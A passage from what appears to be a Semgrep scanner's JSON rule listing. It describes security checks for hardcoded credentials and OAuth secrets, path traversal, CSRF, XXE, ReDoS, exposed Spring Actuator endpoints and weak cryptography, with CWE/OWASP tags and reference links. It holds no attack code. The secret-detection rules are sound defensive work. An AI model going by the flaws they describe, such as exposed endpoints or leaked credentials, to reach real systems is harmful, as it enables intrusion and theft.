Module)."},"helpUri":"https://semgrep.dev/r/javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret","id":"javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret","name":"javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"String argument $A is used to read or write data from a file via Path.Combine without direct sanitization via Path.GetFileName. If the path is user-supplied data this can lead to path traversal."},"help":{"markdown":"String argument $A is used to read or write data from a file via Path.Combine without direct sanitization via Path.GetFileName. If the path is user-supplied data this can lead to path traversal.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine)\n - [https://www.praetorian.com/blog/pathcombine-security-issues-in-aspnet-applications/](https://www.praetorian.com/blog/pathcombine-security-issues-in-aspnet-applications/)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.io.path.combine?view=net-6.0#remarks](https://docs.microsoft.com/en-us/dotnet/api/system.io.path.combine?view=net-6.0#remarks)\n","text":"String argument $A is used to read or write data from a file via Path.Combine without direct sanitization via Path.GetFileName. If the path is user-supplied data this can lead to path traversal."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine","id":"csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine","name":"csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret","id":"ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret","name":"ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"A CSRF middleware was not detected in your express application. Ensure you are either using one such as `csurf` or `csrf` (see rule references) and/or you are properly doing CSRF validation in your routes with a token or cookies."},"help":{"markdown":"A CSRF middleware was not detected in your express application. Ensure you are either using one such as `csurf` or `csrf` (see rule references) and/or you are properly doing CSRF validation in your routes with a token or cookies.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage)\n - [https://www.npmjs.com/package/csurf](https://www.npmjs.com/package/csurf)\n - [https://www.npmjs.com/package/csrf](https://www.npmjs.com/package/csrf)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"A CSRF middleware was not detected in your express application. Ensure you are either using one such as `csurf` or `csrf` (see rule references) and/or you are properly doing CSRF validation in your routes with a token or cookies."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage","id":"javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage","name":"javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths](https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi","id":"python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi","name":"python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for calls to without_protection during mass assignment (which allows record creation from hash values). This can lead to users bypassing permissions protections. For Rails 4 and higher, mass protection is on by default. Fix: Don't use :without_protection => true. Instead, configure attr_accessible to control attribute access."},"help":{"markdown":"Checks for calls to without_protection during mass assignment (which allows record creation from hash values). This can lead to users bypassing permissions protections. For Rails 4 and higher, mass protection is on by default. Fix: Don't use :without_protection => true. Instead, configure attr_accessible to control attribute access.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln)\n - [https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_without_protection.rb](https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_without_protection.rb)\n - [https://www.acunetix.com/vulnerabilities/web/rails-mass-assignment/](https://www.acunetix.com/vulnerabilities/web/rails-mass-assignment/)\n","text":"Checks for calls to without_protection during mass assignment (which allows record creation from hash values). This can lead to users bypassing permissions protections. For Rails 4 and higher, mass protection is on by default. Fix: Don't use :without_protection => true. Instead, configure attr_accessible to control attribute access."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln","id":"ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln","name":"ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln","properties":{"precision":"very-high","tags":["CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use $FORM.cleaned_data[] instead of request.POST[] after form.is_valid() has been executed to only access sanitized data"},"help":{"markdown":"Use $FORM.cleaned_data[] instead of request.POST[] after form.is_valid() has been executed to only access sanitized data\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid)\n - [https://docs.djangoproject.com/en/4.2/ref/forms/api/#accessing-clean-data](https://docs.djangoproject.com/en/4.2/ref/forms/api/#accessing-clean-data)\n","text":"Use $FORM.cleaned_data[] instead of request.POST[] after form.is_valid() has been executed to only access sanitized data"},"helpUri":"https://semgrep.dev/r/python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid","id":"python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid","name":"python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid","properties":{"precision":"very-high","tags":["CWE-20: Improper Input Validation","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a potentially dynamic ClientTrace. This occurred because semgrep could not find a static definition for '$TRACE'. Dynamic ClientTraces are dangerous because they deserialize function code to run when certain Request events occur, which could lead to code being run without your knowledge. Ensure that your ClientTrace is statically defined."},"help":{"markdown":"Detected a potentially dynamic ClientTrace. This occurred because semgrep could not find a static definition for '$TRACE'. Dynamic ClientTraces are dangerous because they deserialize function code to run when certain Request events occur, which could lead to code being run without your knowledge. Ensure that your ClientTrace is statically defined.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace)\n - [https://github.com/returntocorp/semgrep-rules/issues/518](https://github.com/returntocorp/semgrep-rules/issues/518)\n","text":"Detected a potentially dynamic ClientTrace. This occurred because semgrep could not find a static definition for '$TRACE'. Dynamic ClientTraces are dangerous because they deserialize function code to run when certain Request events occur, which could lead to code being run without your knowledge. Ensure that your ClientTrace is statically defined."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace","id":"go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace","name":"go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace","properties":{"precision":"very-high","tags":["CWE-913: Improper Control of Dynamically-Managed Code Resources","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"RegExp() called with a `$ARG` function argument, this might allow an attacker to cause a Regular Expression Denial-of-Service (ReDoS) within your application as RegExP blocks the main thread. For this reason, it is recommended to use hardcoded regexes instead. If your regex is run on user-controlled input, consider performing input validation or use a regex checking/sanitization library such as https://www.npmjs.com/package/recheck to verify that the regex does not appear vulnerable to ReDoS."},"help":{"markdown":"RegExp() called with a `$ARG` function argument, this might allow an attacker to cause a Regular Expression Denial-of-Service (ReDoS) within your application as RegExP blocks the main thread. For this reason, it is recommended to use hardcoded regexes instead. If your regex is run on user-controlled input, consider performing input validation or use a regex checking/sanitization library such as https://www.npmjs.com/package/recheck to verify that the regex does not appear vulnerable to ReDoS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n","text":"RegExp() called with a `$ARG` function argument, this might allow an attacker to cause a Regular Expression Denial-of-Service (ReDoS) within your application as RegExP blocks the main thread. For this reason, it is recommended to use hardcoded regexes instead. If your regex is run on user-controlled input, consider performing input validation or use a regex checking/sanitization library such as https://www.npmjs.com/package/recheck to verify that the regex does not appear vulnerable to ReDoS."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp","id":"javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp","name":"javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Spring Boot Actuator is fully enabled. This exposes sensitive endpoints such as /actuator/env, /actuator/logfile, /actuator/heapdump and others. Unless you have Spring Security enabled or another means to protect these endpoints, this functionality is available without authentication, causing a significant security risk."},"help":{"markdown":"Spring Boot Actuator is fully enabled. This exposes sensitive endpoints such as /actuator/env, /actuator/logfile, /actuator/heapdump and others. Unless you have Spring Security enabled or another means to protect these endpoints, this functionality is available without authentication, causing a significant security risk.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled)\n - [https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-features.html#production-ready-endpoints-exposing-endpoints](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-features.html#production-ready-endpoints-exposing-endpoints)\n - [https://medium.com/walmartglobaltech/perils-of-spring-boot-actuators-misconfiguration-185c43a0f785](https://medium.com/walmartglobaltech/perils-of-spring-boot-actuators-misconfiguration-185c43a0f785)\n - [https://blog.maass.xyz/spring-actuator-security-part-1-stealing-secrets-using-spring-actuators](https://blog.maass.xyz/spring-actuator-security-part-1-stealing-secrets-using-spring-actuators)\n","text":"Spring Boot Actuator is fully enabled. This exposes sensitive endpoints such as /actuator/env, /actuator/logfile, /actuator/heapdump and others. Unless you have Spring Security enabled or another means to protect these endpoints, this functionality is available without authentication, causing a significant security risk."},"helpUri":"https://semgrep.dev/r/java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled","id":"java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled","name":"java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS CloudWatch Log Group has no retention. Missing retention in log groups can cause losing important event information."},"help":{"markdown":"The AWS CloudWatch Log Group has no retention. Missing retention in log groups can cause losing important event information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS CloudWatch Log Group has no retention. Missing retention in log groups can cause losing important event information."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention","id":"terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention","name":"terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Square OAuth Secret detected"},"help":{"markdown":"Square OAuth Secret detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret)\n - [https://github.com/Yelp/detect-secrets/blob/master/tests/plugins/square_oauth_test.py](https://github.com/Yelp/detect-secrets/blob/master/tests/plugins/square_oauth_test.py)\n","text":"Square OAuth Secret detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret","id":"generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret","name":"generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-square-oauth-secret.detected-square-oauth-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS Workspace user volume is unencrypted. The AWS KMS encryption key protects user volume. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"help":{"markdown":"The AWS Workspace user volume is unencrypted. The AWS KMS encryption key protects user volume. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS Workspace user volume is unencrypted. The AWS KMS encryption key protects user volume. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted","id":"terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted","name":"terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-workspaces-user-volume-unencrypted.aws-workspaces-user-volume-unencrypted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection","id":"javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection","name":"javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.puppeteer.security.audit.puppeteer-evaluate-code-injection.puppeteer-evaluate-code-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"PKCS#1 v1.5 decryption is intrinsically vulnerable to timing attacks. The `pycryptodome` implementation attempts to mitigate the risk with some constant-time constructs, however these are not sufficient by themselves and your use of the library may still be vulnerable. Consult the documentation for the library to understand the risks and how to mitigate them. Alternatively, we recommend to use PKCS#1 OAEP instead for a secure by default implementation."},"help":{"markdown":"PKCS#1 v1.5 decryption is intrinsically vulnerable to timing attacks. The `pycryptodome` implementation attempts to mitigate the risk with some constant-time constructs, however these are not sufficient by themselves and your use of the library may still be vulnerable. Consult the documentation for the library to understand the risks and how to mitigate them. Alternatively, we recommend to use PKCS#1 OAEP instead for a secure by default implementation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1)\n - [https://link.springer.com/chapter/10.1007/BFb0055716](https://link.springer.com/chapter/10.1007/BFb0055716)\n - [https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption)\n - [https://www.pycryptodome.org/src/cipher/pkcs1_v1_5](https://www.pycryptodome.org/src/cipher/pkcs1_v1_5)\n","text":"PKCS#1 v1.5 decryption is intrinsically vulnerable to timing attacks. The `pycryptodome` implementation attempts to mitigate the risk with some constant-time constructs, however these are not sufficient by themselves and your use of the library may still be vulnerable. Consult the documentation for the library to understand the risks and how to mitigate them. Alternatively, we recommend to use PKCS#1 OAEP instead for a secure by default implementation."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1","id":"python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1","name":"python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.pycryptodome-rsa-pkcs1.pycryptodome-rsa-pkcs1"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the SAXBuilder parser with `parser.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`, enabling both of `parser.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` and `parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`, and enabling both of `parser.setExpandEntities(false)` and parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the SAXBuilder parser with `parser.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`, enabling both of `parser.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` and `parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`, and enabling both of `parser.setExpandEntities(false)` and parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/827.html](https://cwe.mitre.org/data/definitions/827.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring the SAXBuilder parser with `parser.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`, enabling both of `parser.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` and `parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`, and enabling both of `parser.setExpandEntities(false)` and parser.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet","id":"java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet","name":"java.servlets.security.xxe.tainted-saxbuilder-xxe-servlet.tainted-saxbuilder-xxe-servlet","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security 